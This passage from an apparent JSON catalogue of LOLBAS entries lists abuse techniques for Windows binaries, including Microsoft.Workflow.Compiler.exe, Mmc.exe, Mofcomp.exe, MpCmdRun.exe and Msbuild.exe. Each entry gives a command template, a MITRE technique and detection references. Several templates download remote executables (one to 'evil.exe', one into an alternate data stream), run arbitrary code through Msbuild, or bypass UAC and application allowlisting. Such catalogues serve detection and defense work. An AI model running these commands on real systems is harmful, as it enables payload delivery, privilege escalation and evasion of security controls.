":"IOC","value":"Microsoft.Workflow.Compiler.exe would not normally be run on workstations."},{"type":"IOC","value":"The presence of csc.exe or vbc.exe as child processes of Microsoft.Workflow.Compiler.exe"},{"type":"IOC","value":"Presence of \"<CompilerInput\" in a text file."}],"references":["https://twitter.com/mattifestation/status/1030445200475185154","https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb","https://gist.github.com/mattifestation/3e28d391adbd7fe3e0c722a107a25aba#file-workflowcompilerdetectiontests-ps1","https://gist.github.com/mattifestation/7ba8fc8f724600a9f525714c9cf767fd#file-createcompilerinputxml-ps1","https://www.forcepoint.com/blog/security-labs/using-c-post-powershell-attacks","https://www.fortynorthsecurity.com/microsoft-workflow-compiler-exe-veil-and-cobalt-strike/","https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15","https://lolbas-project.github.io/lolbas/Binaries/Microsoft.Workflow.Compiler/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:microsoft-workflow-compiler-exe:2","toolId":"lolbas:microsoft-workflow-compiler-exe","toolName":"Microsoft.Workflow.Compiler.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log}","description":"Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.","usecase":"Compile and run code","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\Microsoft.Workflow.Compiler.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_workflow_compiler.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Microsoft.Workflow.Compiler.exe would not normally be run on workstations."},{"type":"IOC","value":"The presence of csc.exe or vbc.exe as child processes of Microsoft.Workflow.Compiler.exe"},{"type":"IOC","value":"Presence of \"<CompilerInput\" in a text file."}],"references":["https://twitter.com/mattifestation/status/1030445200475185154","https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb","https://gist.github.com/mattifestation/3e28d391adbd7fe3e0c722a107a25aba#file-workflowcompilerdetectiontests-ps1","https://gist.github.com/mattifestation/7ba8fc8f724600a9f525714c9cf767fd#file-createcompilerinputxml-ps1","https://www.forcepoint.com/blog/security-labs/using-c-post-powershell-attacks","https://www.fortynorthsecurity.com/microsoft-workflow-compiler-exe-veil-and-cobalt-strike/","https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15","https://lolbas-project.github.io/lolbas/Binaries/Microsoft.Workflow.Compiler/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mmc-exe:0","toolId":"lolbas:mmc-exe","toolName":"Mmc.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"mmc.exe -Embedding {PATH_ABSOLUTE:.msc}","description":"Launch a 'backgrounded' MMC process and invoke a COM payload","usecase":"Configure a snap-in to load a COM custom class (CLSID) that has been added to the registry","mitre":["T1218.014"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mmc.exe","C:\\Windows\\SysWOW64\\mmc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mmc_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml"}],"references":["https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/","https://offsec.almond.consulting/UAC-bypass-dotnet.html","https://www.youtube.com/watch?v=LFgZOTmhzeA","https://lolbas-project.github.io/lolbas/Binaries/Mmc/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mmc-exe:1","toolId":"lolbas:mmc-exe","toolName":"Mmc.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"mmc.exe gpedit.msc","description":"Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC.","usecase":"Modify HKCU\\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL.","mitre":["T1218.014"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\mmc.exe","C:\\Windows\\SysWOW64\\mmc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mmc_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml"}],"references":["https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/","https://offsec.almond.consulting/UAC-bypass-dotnet.html","https://www.youtube.com/watch?v=LFgZOTmhzeA","https://lolbas-project.github.io/lolbas/Binaries/Mmc/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mmc-exe:2","toolId":"lolbas:mmc-exe","toolName":"Mmc.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"mmc.exe -Embedding {PATH_ABSOLUTE:.msc}","description":"Download and save an executable to disk","usecase":"Download file from Internet","mitre":["T1218.014"],"privilege":"user","fullPath":["C:\\Windows\\System32\\mmc.exe","C:\\Windows\\SysWOW64\\mmc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mmc_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml"}],"references":["https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/","https://offsec.almond.consulting/UAC-bypass-dotnet.html","https://www.youtube.com/watch?v=LFgZOTmhzeA","https://lolbas-project.github.io/lolbas/Binaries/Mmc/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mofcomp-exe:0","toolId":"lolbas:mofcomp-exe","toolName":"Mofcomp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"mofcomp.exe {PATH_ABSOLUTE:.mof}","description":"Abuse of mofcomp.exe to parse a file which contains MOF statements in order create new classes as part of the WMI repository","usecase":"Threat actors can use mofcomp.exe to register a malicious MOF file as a new class in the WMI repository","mitre":["T1047"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wbem\\mofcomp.exe","C:\\Windows\\SysWOW64\\wbem\\mofcomp.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"strange parent processes spawning mofcomp.exe like cmd.exe or powershell.exe"},{"type":"Sigma","value":"https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml"}],"references":["https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp","https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof-","https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/","https://in.security/2019/04/03/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/","https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96","https://lolbas-project.github.io/lolbas/Binaries/Mofcomp/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mpcmdrun-exe:0","toolId":"lolbas:mpcmdrun-exe","toolName":"MpCmdRun.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe}","description":"Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)","usecase":"Download file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.4-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.7-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\MpCmdRun.exe","C:\\Program Files\\Windows Defender\\MpCmdRun.exe","C:\\Program Files (x86)\\Windows Defender\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.23110.3-0\\X86\\MpCmdRun.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/159bf4bbc103cc2be3fef4b7c2e7c8b23b63fd10/rules/windows/process_creation/win_susp_mpcmdrun_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/6ef5c53b0c15e344f0f2d1649941391aea6fa253/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml"},{"type":"IOC","value":"MpCmdRun storing data into alternate data streams."},{"type":"IOC","value":"MpCmdRun retrieving a file from a remote machine or the internet that is not expected."},{"type":"IOC","value":"Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe."},{"type":"IOC","value":"Monitor for the creation of %USERPROFILE%\\AppData\\Local\\Temp\\MpCmdRun.log"},{"type":"IOC","value":"User Agent is \"MpCommunication\""}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus","https://twitter.com/mohammadaskar2/status/1301263551638761477","https://twitter.com/Oddvarmoe/status/1301444858910052352","https://twitter.com/NotMedic/status/1301506813242867720","https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mpcmdrun-exe:1","toolId":"lolbas:mpcmdrun-exe","toolName":"MpCmdRun.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"copy \"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\MpCmdRun.exe\" C:\\Users\\Public\\Downloads\\MP.exe && chdir \"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\\" && \"C:\\Users\\Public\\Downloads\\MP.exe\" -DownloadFile -url {REMOTEURL:.exe} -path C:\\Users\\Public\\Downloads\\evil.exe","description":"Download file to specified path. Slashes work as well as dashes (/DownloadFile, /url, /path). Updated version to bypass Windows 10 mitigation.","usecase":"Download file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.4-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.7-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\MpCmdRun.exe","C:\\Program Files\\Windows Defender\\MpCmdRun.exe","C:\\Program Files (x86)\\Windows Defender\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.23110.3-0\\X86\\MpCmdRun.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/159bf4bbc103cc2be3fef4b7c2e7c8b23b63fd10/rules/windows/process_creation/win_susp_mpcmdrun_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/6ef5c53b0c15e344f0f2d1649941391aea6fa253/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml"},{"type":"IOC","value":"MpCmdRun storing data into alternate data streams."},{"type":"IOC","value":"MpCmdRun retrieving a file from a remote machine or the internet that is not expected."},{"type":"IOC","value":"Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe."},{"type":"IOC","value":"Monitor for the creation of %USERPROFILE%\\AppData\\Local\\Temp\\MpCmdRun.log"},{"type":"IOC","value":"User Agent is \"MpCommunication\""}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus","https://twitter.com/mohammadaskar2/status/1301263551638761477","https://twitter.com/Oddvarmoe/status/1301444858910052352","https://twitter.com/NotMedic/status/1301506813242867720","https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:mpcmdrun-exe:2","toolId":"lolbas:mpcmdrun-exe","toolName":"MpCmdRun.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe}:evil.exe","description":"Download file to machine and store it in Alternate Data Stream","usecase":"Hide downloaded data into an Alternate Data Stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.4-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.7-0\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\MpCmdRun.exe","C:\\Program Files\\Windows Defender\\MpCmdRun.exe","C:\\Program Files (x86)\\Windows Defender\\MpCmdRun.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.23110.3-0\\X86\\MpCmdRun.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/159bf4bbc103cc2be3fef4b7c2e7c8b23b63fd10/rules/windows/process_creation/win_susp_mpcmdrun_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/6ef5c53b0c15e344f0f2d1649941391aea6fa253/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml"},{"type":"IOC","value":"MpCmdRun storing data into alternate data streams."},{"type":"IOC","value":"MpCmdRun retrieving a file from a remote machine or the internet that is not expected."},{"type":"IOC","value":"Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe."},{"type":"IOC","value":"Monitor for the creation of %USERPROFILE%\\AppData\\Local\\Temp\\MpCmdRun.log"},{"type":"IOC","value":"User Agent is \"MpCommunication\""}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus","https://twitter.com/mohammadaskar2/status/1301263551638761477","https://twitter.com/Oddvarmoe/status/1301444858910052352","https://twitter.com/NotMedic/status/1301506813242867720","https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msbuild-exe:0","toolId":"lolbas:msbuild-exe","toolName":"Msbuild.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"msbuild.exe {PATH:.xml}","description":"Build and execute a C# project stored in the target XML file.","usecase":"Compile and run code","mitre":["T1127.001"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Msbuild.exe","C:\\Program Files (x86)\\MSBuild\\14.0\\bin\\MSBuild.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_rename.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_beacon_sequence.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_making_network_connections.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Msbuild.exe should not normally be executed on workstations"}],"references":["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md","https://github.com/Cn33liz/MSBuildShell","https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191","https://github.com/LOLBAS-Project/LOLBAS/issues/165","https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files","https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events","https://lolbas-project.github.io/lolbas/Binaries/Msbuild/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msbuild-exe:1","toolId":"lolbas:msbuild-exe","toolName":"Msbuild.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msbuild.exe {PATH:.csproj}","description":"Build and execute a C# project stored in the target csproj file.","usecase":"Compile and run code","mitre":["T1127.001"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Msbuild.exe","C:\\Program Files (x86)\\MSBuild\\14.0\\bin\\MSBuild.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_rename.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_beacon_sequence.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_making_network_connections.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Msbuild.exe should not normally be executed on workstations"}],"references":["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md","https://github.com/Cn33liz/MSBuildShell","https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191","https://github.com/LOLBAS-Project/LOLBAS/issues/165","https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files","https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events","https://lolbas-project.github.io/lolbas/Binaries/Msbuild/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msbuild-exe:2","toolId":"lolbas:msbuild-exe","toolName":"Msbuild.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msbuild.exe /logger:TargetLogger,{PATH_ABSOLUTE:.dll};MyParameters,Foo","description":"Executes generated Logger DLL file with TargetLogger export.","usecase":"Execute DLL","mitre":["T1127.001"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Msbuild.exe","C:\\Program Files (x86)\\MSBuild\\14.0\\bin\\MSBuild.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_spawn.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_msbuild_rename.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_beacon_sequence.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_msbuild_making_network_connections.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/defense_evasion_execution_msbuild_started_by_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_execution_msbuild_started_renamed.toml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Msbuild.exe should not normally be executed on workstations"}],"references":["https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md","https://github.com/Cn33liz/MSBuildShell","https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191","https://github.com/LOLBAS-Project/LOLBAS/issues/165","https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files","https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events","https://lolbas-project.github.io/lolbas/Binaries/Msbuild/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msbuild-exe:3","toolId":"lolbas:msbuild-exe","toolName":"Msbuild.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msbuild.exe {PATH:.proj}","description":"Execute JScript/VBScript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.","usecase":"Execute project file that contains XslTransformation tag parameters","mitre":["T1127.001"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Msbuild.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Msbuild.exe","C:\\Program Files 